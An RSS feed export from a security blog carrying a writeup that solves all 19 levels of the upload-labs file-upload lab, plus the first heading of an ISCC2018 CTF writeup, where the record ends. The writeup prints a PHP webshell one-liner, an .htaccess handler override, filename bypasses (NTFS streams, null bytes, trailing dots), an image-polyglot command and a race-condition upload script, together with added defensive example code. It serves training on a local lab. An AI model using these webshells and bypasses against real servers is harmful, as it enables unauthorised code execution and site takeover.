<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Writeup &#8211; ChaBug安全</title>
	<atom:link href="/tags/writeup/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>A blog for sharing knowledge, meeting peers and sharing resources</description>
	<lastBuildDate>Thu, 26 Jul 2018 03:17:44 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>upload-labs-writeup: solutions for the upload-labs file upload vulnerability range</title>
		<link>/web/470.html</link>
					<comments>/web/470.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 24 Jul 2018 06:44:40 +0000</pubDate>
				<category><![CDATA[Penetration testing]]></category>
		<category><![CDATA[upload]]></category>
		<category><![CDATA[Writeup]]></category>
		<category><![CDATA[Upload]]></category>
		<category><![CDATA[Bypass]]></category>
		<category><![CDATA[Notes]]></category>
		<guid isPermaLink="false">/?p=470</guid>

					<description><![CDATA[0x00: Introduction. This article records how to get past all 19 upload levels of upload-labs (latest commit 17ec936), a PHP-based range for file upload vulnerabilities. It is written for readers who already know the basics of upload bypa...]]></description>
										<content:encoded><![CDATA[<h3>0x00: Introduction</h3>
<p>This article records the methods for getting past all 19 upload levels of <a href="https://github.com/c0ny1/upload-labs">upload-labs</a> (latest commit <a href="https://github.com/c0ny1/upload-labs/commit/17ec93650d05d956e5868518cd6e8e36085ab2a3">17ec936</a>), a PHP-based range for file <span class="wpcom_tag_link"><a href="/tags/%e4%b8%8a%e4%bc%a0" title="Upload" target="_blank">upload</a></span> vulnerabilities.</p>
<p>It is written for readers who already know the basics of upload bypasses. For the underlying principles see other articles and the project source; for reasons of space they are not explained here.</p>
<h3><a id="user-content-0x01测试配置" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x01%E6%B5%8B%E8%AF%95%E9%85%8D%E7%BD%AE" aria-hidden="true"></a>0x01: Test setup</h3>
<p>To save time, download the author's preconfigured PHPStudy <a href="https://github.com/c0ny1/upload-labs/releases">range environment</a>.</p>
<table>
<thead>
<tr>
<th align="left">Browser</th>
<th align="left">Firefox</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Plugin</strong></td>
<td align="left">NoScript</td>
</tr>
<tr>
<td align="left"><strong>Plugin</strong></td>
<td align="left">HackBar</td>
</tr>
<tr>
<td align="left"><strong>Intercepting proxy</strong></td>
<td align="left">Burpsuite Pro</td>
</tr>
<tr>
<td align="left"><strong>Webshell code</strong></td>
<td align="left"><code>&lt;?php assert($_POST["LandGrey"])?&gt;</code></td>
</tr>
</tbody>
</table>
<h3><a id="user-content-0x02绕过方法" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x02%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95" aria-hidden="true"></a>0x02: Bypass methods</h3>
<h4><a id="user-content-pass-01" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-01" aria-hidden="true"></a>Pass-01</h4>
<p>The check runs only in the browser: disable JavaScript on the page and upload the webshell directly.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/01-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/01-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-02" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-02" aria-hidden="true"></a>Pass-02</h4>
<p>Intercept the upload request, change the Content-Type to <code>image/gif</code>, then forward it.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/02-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/02-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-03" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-03" aria-hidden="true"></a>Pass-03</h4>
<p>Bypass by overriding how the server parses files. First upload a file named <code>.htaccess</code> with the following content:</p>
<pre><code>&lt;FilesMatch "03.jpg"&gt;
SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-1.png" alt="" /></a></p>
<p>Then upload a file named <code>03.jpg</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-2.png" alt="" /></a></p>
<p>Request the uploaded <code>03.jpg</code>: the handler rule makes Apache execute it as a PHP script</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/03-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/03-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-04" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-04" aria-hidden="true"></a>Pass-04</h4>
<p>Exploit a quirk of PHP on Windows: when file names are matched, the following characters are treated as equivalent:</p>
<pre><code>double quote "      =   dot .
greater-than &gt;     =   question mark ?
less-than &lt;        =   asterisk *
</code></pre>
<p>First upload a file named <code>4.php:.jpg</code>. The upload succeeds and creates an empty <code>4.php</code> of 0 KB (the <code>:.jpg</code> part is taken as an NTFS alternate data stream name).</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/04-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/04-1.png" alt="" /></a></p>
<p>Then rename the file to <code>4.&lt;</code> (or <code>4.&lt;&lt;&lt;</code>, <code>4.&gt;&gt;&gt;</code>, <code>4.&gt;&gt;&lt;</code>) and upload again. The wildcard name matches the existing <code>4.php</code>, so the upload overwrites it and the webshell code ends up in the previously empty <code>4.php</code>.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/04-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/04-2.png" alt="" /></a></p>
<h4><a id="user-content-pass-05" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-05" aria-hidden="true"></a>Pass-05</h4>
<p>Mixed-case extension bypass: rename <code>05.php</code> to <code>05.phP</code> and upload.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/05-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/05-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-06" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-06" aria-hidden="true"></a>Pass-06</h4>
<p>Windows file-name quirk. Append a <strong>dot and a space</strong> to the name, i.e. <code>06.php.</code> followed by a space. When Windows saves the file it strips trailing dots and spaces, so the stored name is just <code>06.php</code>.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/06-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/06-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-07" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-07" aria-hidden="true"></a>Pass-07</h4>
<p>Same principle as <strong>Pass-06</strong>: append a dot, i.e. <code>07.php.</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/07-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/07-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-08" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-08" aria-hidden="true"></a>Pass-08</h4>
<p>Windows alternate data stream bypass: name the file <code>08.php::$DATA</code>; the file that is actually stored after the upload is <code>08.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/08-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/08-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-09" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-09" aria-hidden="true"></a>Pass-09</h4>
<p><strong>Same principle as Pass-06</strong>: append <strong>dot + space + dot</strong>, i.e. <code>09.php. .</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/09-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/09-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-10" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-10" aria-hidden="true"></a>Pass-10</h4>
<p>Double-write bypass: name the file <code>10.pphphp</code>; the filter deletes the banned string in a single pass, and what is left is <code>10.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/10-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/10-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-11" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-11" aria-hidden="true"></a>Pass-11</h4>
<p>%00 truncation of the upload path. Name the file <code>11.jpg</code> and set save_path to <code>../<span class="wpcom_tag_link"><a href="/tags/upload" title="upload" target="_blank">upload</a></span>/11.php%00</code>; the file that ends up on disk is <code>11.php</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/11-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/11-1.png" alt="" /></a></p>
<h4><a id="user-content-pass-12" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-12" aria-hidden="true"></a>Pass-12</h4>
<p>php.ini has <code>magic_quotes_gpc = Off</code></p>
<p>Same principle as <strong>Pass-11</strong>, 0x00 truncation of the upload path, except that the null byte is sent raw: use Burp's Hex view to set save_path to <code>../upload/12.php[raw 0x00 byte]</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/12-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/12-1.png" alt="" /></a></p>
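<p>Pass-05 through Pass-12 (and the file-name variant in Pass-19) all exploit the same gap: the string the blacklist inspects is not the name the operating system, or an old PHP's C library, ends up writing. The following Python is an added example, not code from the writeup or from upload-labs. It models the naive blacklist, the Pass-10 word-deletion filter, the Windows and null-byte name rewriting, and an allowlist check that canonicalises first and never lets the client's name reach the disk. The blacklist, allowlist and the "what Windows stores" model are constructed for the example.</p>

```python
import re
import uuid

# Constructed lists; the lab's own blacklist is longer.
BLACKLIST = {"php", "php3", "php4", "php5", "phtml", "htaccess"}
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}

# Bypass names from the writeup (Pass-05 to Pass-12). "\x00" is the raw null
# byte that %00 becomes after URL decoding.
BYPASSES = [
    "05.phP",
    "06.php. ",
    "07.php.",
    "08.php::$DATA",
    "09.php. .",
    "11.php\x00.jpg",
    "../upload/12.php\x00",
]


def naive_blacklist_ok(filename):
    """Blacklist check as the early levels do it: take the text after the last
    dot and compare it, untouched, against the banned list. True = accepted."""
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return ext not in BLACKLIST


def word_deletion_filter(filename):
    """Pass-10 style filter: delete every banned word in one pass (like PHP's
    str_ireplace). The pass never rescans the text it just produced."""
    pattern = "|".join(re.escape(word) for word in BLACKLIST)
    return re.sub(pattern, "", filename, flags=re.IGNORECASE)


def windows_stored_name(name):
    """Constructed model of what Windows writes: an explicit ::$DATA stream
    suffix is dropped, then trailing dots and spaces are stripped."""
    if name.endswith("::$DATA"):
        name = name[: -len("::$DATA")]
    return name.rstrip(". ")


def legacy_c_path(path):
    """Old PHP handed paths to C functions, which stop at the first NUL byte;
    everything after the %00 is silently dropped."""
    return path.split("\x00", 1)[0]


def hardened_extension(filename):
    """Allowlist check that canonicalises the name the way the OS will before
    looking at it. Raises ValueError on anything suspicious and returns the
    lower-case extension the file will be stored under."""
    if any(ord(ch) < 32 for ch in filename):                 # %00 / 0x00 family
        raise ValueError("control character in file name")
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]    # strip directories
    base = base.rstrip(". ")                                 # what Windows would do anyway
    if "::" in base:                                         # NTFS stream syntax
        raise ValueError("stream syntax in file name")
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWLIST:
        raise ValueError("extension ." + ext + " not allowed")
    return ext


def stored_name(filename):
    """Server-chosen name: nothing from the client reaches the disk except the
    validated extension."""
    return uuid.uuid4().hex + "." + hardened_extension(filename)


def survey():
    """For each bypass: does the naive check accept it, which name lands on disk,
    and what the hardened check says."""
    rows = []
    for name in BYPASSES:
        stored = windows_stored_name(legacy_c_path(name)).rsplit("/", 1)[-1]
        try:
            hardened_extension(name)
            verdict = "accepted"
        except ValueError as err:
            verdict = "rejected: " + str(err)
        rows.append((name, naive_blacklist_ok(name), stored, verdict))
    return rows


if __name__ == "__main__":
    for row in survey():
        print(row)
    print(word_deletion_filter("10.pphphp"))
```

<p>Every name in the list passes the naive check and still lands as a <code>.php</code> file, while the hardened check rejects all of them. The rename step matters as much as the allowlist: even a renderer bypass such as Pass-16 is harmless if the stored file is called <code>&lt;random&gt;.gif</code> and nothing maps that suffix to the PHP handler.</p>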
<h4><a id="user-content-pass-13" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-13" aria-hidden="true"></a>Pass-13</h4>
<p>Bypass the file-header check by prefixing the file with the GIF signature <code>GIF89a</code>.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-1.png" alt="" /></a></p>
<p>Run <code>copy normal.jpg /b + shell.php /a webshell.jpg</code> to append the PHP one-liner to the end of a jpg image (if the code does not come through completely, fix it by hand). The result is a jpg that carries the webshell code and can be uploaded as is. <a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/webshell.jpg">Example JPG one-liner shell</a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-2.png" alt="" /></a></p>
<p>png images are handled the same way. <a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/webshell.png">Example PNG one-liner shell</a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/13-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/13-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-14" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-14" aria-hidden="true"></a>Pass-14</h4>
<p>Same principle and example as <strong>Pass-13</strong>: prefix the GIF signature to get past the check</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/14-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/14-1.png" alt="" /></a></p>
<p>png webshell upload: same as <strong>Pass-13</strong>.</p>
<p>jpg/jpeg webshell upload is broken in this level: even a normal jpg cannot be uploaded. Waiting for the author to fix it.</p>
<h4><a id="user-content-pass-15" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-15" aria-hidden="true"></a>Pass-15</h4>
<p>Same principle as <strong>Pass-13</strong>: prefix the GIF signature to get past the check</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/15-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/15-1.png" alt="" /></a></p>
<p>png webshell upload: same as <strong>Pass-13</strong>.</p>
<p>jpg/jpeg webshell upload: same as <strong>Pass-13</strong>.</p>
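<p>Pass-13, Pass-14 and Pass-15 all decide on the leading bytes of the file, which is why a <code>GIF89a</code> prefix or a <code>copy /b</code> polyglot gets through, and Pass-16 is only harder because it re-encodes the image. The following Python is an added example, not code from the writeup or the lab: it builds the two payload styles, shows what a header-only check sees, and walks the GIF block structure to show where the appended payload actually sits (after the trailer byte, which is exactly the part a re-encoder never copies). The 43-byte one-pixel GIF is constructed inline so the example runs without any image file.</p>

```python
import struct

PAYLOAD = b'<?php assert($_POST["LandGrey"])?>'   # the writeup's one-liner

# Smallest complete GIF89a (1x1 transparent pixel), constructed here.
TINY_GIF = bytes.fromhex(
    "474946383961"            # "GIF89a"
    "01000100800000"          # logical screen 1x1, global colour table flag set (2 entries)
    "000000ffffff"            # the two palette entries
    "21f9040100000000"        # graphic control extension (transparency)
    "2c000000000100010000"    # image descriptor: 1x1 at (0,0), no local table
    "02" "024401" "00"        # LZW min code size, one data sub-block, terminator
    "3b"                      # trailer: a renderer stops reading here
)


def magic_ok(data):
    """What a header-only check sees: nothing but the first few bytes."""
    return (data[:6] in (b"GIF87a", b"GIF89a")
            or data[:3] == b"\xff\xd8\xff"
            or data[:8] == b"\x89PNG\r\n\x1a\n")


def append_payload(image, payload):
    """The `copy image /b + shell.php /a out` trick: plain concatenation."""
    return image + payload


def _skip_sub_blocks(data, pos):
    """GIF data is stored as length-prefixed sub-blocks ending with a 0 byte."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def parse_gif(data):
    """Walk the block structure like a decoder would. Returns (width, height,
    bytes after the trailer) or raises ValueError if the structure is broken."""
    if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 13:
        raise ValueError("not a GIF header")
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13
    if packed & 0x80:                         # global colour table: 3 * 2^(n+1) bytes
        pos += 3 * (2 << (packed & 0x07))
    while True:
        if pos >= len(data):
            raise ValueError("truncated GIF: no trailer")
        block = data[pos]
        pos += 1
        if block == 0x3B:                     # trailer
            return width, height, data[pos:]
        if block == 0x21:                     # extension: label byte, then sub-blocks
            pos += 1
        elif block == 0x2C:                   # image descriptor
            if len(data) < pos + 10:
                raise ValueError("truncated image descriptor")
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:           # optional local colour table
                pos += 3 * (2 << (local_packed & 0x07))
            pos += 1                          # LZW minimum code size
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (block, pos - 1))
        pos = _skip_sub_blocks(data, pos)


def is_structurally_valid(data):
    try:
        parse_gif(data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    header_only = b"GIF89a" + PAYLOAD                  # Pass-13 style
    polyglot = append_payload(TINY_GIF, PAYLOAD)       # copy /b style
    for name, sample in (("header only", header_only), ("polyglot", polyglot)):
        print(name, "magic ok:", magic_ok(sample), "structure ok:", is_structurally_valid(sample))
    print("bytes after trailer:", parse_gif(polyglot)[2])
```

<p>Both samples satisfy the magic check; only the polyglot survives a structural walk, and its payload sits entirely after the trailer. That is why the writeup's Pass-16 samples have to be built differently: a function that re-encodes pixel data never sees those trailing bytes, so the code has to live inside a block that survives decoding and re-encoding.</p>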
<h4><a id="user-content-pass-16" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-16" aria-hidden="true"></a>Pass-16</h4>
<p>Principle: upload an image that displays normally, compare the rendered copy with the original, find a data block that survives rendering unchanged, and put the webshell code there before uploading. Doing this needs a Python program of your own; crafting an image that survives the rendering function by hand is practically impossible.</p>
<p>Here is a GIF <a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefromgif-pass-00.gif">example</a> that carries the one-liner webshell and survives PHP's imagecreatefromgif.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-1.png" alt="" /></a></p>
<p>Open the rendered image: the webshell code is still there</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-2.png" alt="" /></a></p>
<p>And a jpg <a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefromjpeg-pass-LandGrey.jpg">example file</a> that survives imagecreatefromjpeg. Uploading it directly triggers a Warning saying the file is not a jpg image, yet the upload has in fact succeeded, and the file name is unchanged.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-3.png" alt="" /></a></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-4.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-4.png" alt="" /></a></p>
<p>The jpg upload above shows we were overthinking it: the program does not handle a rendering failure. Just insert the webshell code into a normal png and upload the <a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/webshell/bypass-imagecreatefrompng-pass-LandGrey.png">example file</a>; the image does not even need to remain valid.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-5.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-5.png" alt="" /></a></p>
<p>The program still does not rename the file, so the broken png carrying the webshell is uploaded as is.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/16-6.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/16-6.png" alt="" /></a></p>
<h4><a id="user-content-pass-17" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-17" aria-hidden="true"></a>Pass-17</h4>
<p>Race-condition bypass: the file is saved before it is checked and deleted, and the gap between the two can be hit. Install the <a href="https://github.com/BugScanTeam/hackhttp">hackhttp</a> module with <code>pip install hackhttp</code> and run the Python script below. If the file is still deleted too quickly, raise the number of concurrent threads.</p>
<pre class="lang:default decode:true " >#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
#
# Pass-17 saves the upload first and checks/unlinks it afterwards. Keep
# re-uploading 17.php from several threads so that there is almost always
# a copy on disk while the webshell URL is being requested.

import hackhttp
from multiprocessing.dummy import Pool as ThreadPool


def upload(lists):
    hh = hackhttp.hackhttp()
    # Raw multipart request captured from the browser; the form field name,
    # cookie and boundary must match the lab's own upload form.
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream

&lt;?php assert($_POST["LandGrey"])?&gt;
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(code) + "\r")


pool = ThreadPool(10)            # concurrent upload workers
pool.map(upload, range(10000))   # total number of uploads
pool.close()
pool.join()</pre>
<p>While the script is running, request the webshell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/17-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/17-1.png" alt="" /></a></p>
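<p>The race above works because the server does "write to the web root, then check, then unlink", and the attacker only needs one request to land inside that window. The following Python is an added example, not the writeup's script and not the lab's code: it reproduces the vulnerable order of operations and a hardened one locally, with a thread playing the attacker who keeps requesting the webshell (reading the file stands in for the HTTP request). The <code>window</code> delay is a constructed stand-in for the time a real server spends between saving and checking; the staging directory is kept inside the temporary directory only so that the final rename stays on one filesystem. POSIX semantics are assumed for the unlink.</p>

```python
import os
import tempfile
import threading
import time
import uuid

PAYLOAD = b'<?php assert($_POST["LandGrey"])?>'
ALLOWED = (".jpg", ".png", ".gif")


def vulnerable_upload(upload_dir, filename, content, window=0.05):
    """Pass-17 pattern (constructed model): the file is written into the web
    root first, checked afterwards, and unlinked if the check fails."""
    path = os.path.join(upload_dir, filename)
    with open(path, "wb") as fh:
        fh.write(content)
    time.sleep(window)                       # the check-and-unlink latency
    if not filename.lower().endswith(ALLOWED):
        for _ in range(1000):                # Windows refuses to unlink an open file; retry
            try:
                os.unlink(path)
                break
            except PermissionError:
                time.sleep(0.001)
        return None
    return path


def hardened_upload(upload_dir, filename, content):
    """Decide before anything touches the web root, write under a server-chosen
    name in a staging directory, then move the finished file into place with an
    atomic rename. Nothing ever exists under the client's name."""
    if not filename.lower().endswith(ALLOWED):
        return None
    staging = os.path.join(upload_dir, ".staging")   # outside the web root in practice
    os.makedirs(staging, exist_ok=True)
    final = uuid.uuid4().hex + os.path.splitext(filename)[1].lower()
    part = os.path.join(staging, final + ".part")
    with open(part, "wb") as fh:
        fh.write(content)
    os.replace(part, os.path.join(upload_dir, final))
    return os.path.join(upload_dir, final)


def poll_for_shell(path, stop, hits):
    """The attacker's half of the race: request the webshell URL (here, read the
    file) as fast as possible until told to stop."""
    while not stop.is_set():
        try:
            with open(path, "rb") as fh:
                if fh.read() == PAYLOAD:
                    hits.append(time.monotonic())
        except OSError:
            pass
        time.sleep(0.001)


def race(handler, attempts=10):
    """Push `attempts` uploads of 17.php through `handler` while the attacker
    polls; return how many times the attacker read the webshell."""
    with tempfile.TemporaryDirectory() as upload_dir:
        stop, hits = threading.Event(), []
        target = os.path.join(upload_dir, "17.php")
        worker = threading.Thread(target=poll_for_shell, args=(target, stop, hits))
        worker.start()
        try:
            for _ in range(attempts):
                handler(upload_dir, "17.php", PAYLOAD)
        finally:
            stop.set()
            worker.join()
    return len(hits)


def demo():
    return race(vulnerable_upload), race(hardened_upload)


if __name__ == "__main__":
    vulnerable_hits, hardened_hits = demo()
    print("vulnerable handler: webshell readable", vulnerable_hits, "times")
    print("hardened handler:   webshell readable", hardened_hits, "times")
```

<p>With the vulnerable handler the poller reads the webshell on essentially every attempt; with the hardened one it never does, because the decision is made before the write and the stored name is not the attacker's. Pass-18, where the rename rather than the unlink is raced, fails for the same reason once the check precedes the write.</p>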
<h4><a id="user-content-pass-18" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-18" aria-hidden="true"></a>Pass-18</h4>
<p>At first I found no bypass; in the end I downloaded the packaged environment the author provides on GitHub and got through by combining an upload-then-rename race with the Apache parsing vulnerability.</p>
<p>Upload a file named <code>18.php.7Z</code> and resubmit the request rapidly. The response says the file has already been uploaded, but it has not been renamed.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-1.png" alt="" /></a></p>
<p>Submitting the request fast enough lets the file be uploaded without being renamed.</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-2.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-2.png" alt="" /></a></p>
<p>Then use the Apache parsing vulnerability (with multiple extensions, Apache ignores the unknown <code>.7Z</code> suffix and falls back to the <code>.php</code> handler) to get a shell</p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/18-3.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/18-3.png" alt="" /></a></p>
<h4><a id="user-content-pass-19" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#pass-19" aria-hidden="true"></a>Pass-19</h4>
<p>Same principle as <strong>Pass-11</strong>, but the 0x00 goes into the file name: <code>19.php[raw 0x00 byte].1.jpg</code></p>
<p><a href="https://github.com/LandGrey/upload-labs-writeup/blob/master/image/19-1.png" target="_blank" rel="noopener"><img src="https://github.com/LandGrey/upload-labs-writeup/raw/master/image/19-1.png" alt="" /></a></p>
<h3><a id="user-content-0x03后记" class="anchor" href="https://github.com/LandGrey/upload-labs-writeup/#0x03%E5%90%8E%E8%AE%B0" aria-hidden="true"></a>0x03: Afterword</h3>
<p>Some of the bypasses above repeat each other and some are accidents that probably do not match the project author's intent, so treat this article as a reference only.</p>
<p>It will be updated once the author fixes the code logic.</p>
]]></content:encoded>
					
					<wfw:commentRss>/web/470.html/feed</wfw:commentRss>
			<slash:comments>5</slash:comments>
		
		
			</item>
		<item>
		<title>ISCC2018 writeup(web)</title>
		<link>/ctf/423.html</link>
		
		<dc:creator><![CDATA[s1ye]]></dc:creator>
		<pubDate>Fri, 25 May 2018 12:08:55 +0000</pubDate>
				<category><![CDATA[CTF notes]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[iscc2018]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">/?p=322</guid>

					<description><![CDATA[Compare the numbers: F12, change maxlength to 4. web01: strcmp() returns NULL when given an array, and PHP is weakly typed; in an == comparison against a number the other side is first converted...]]></description>
										<content:encoded><![CDATA[<h2>Compare the numbers (比较数字大小)</h2>
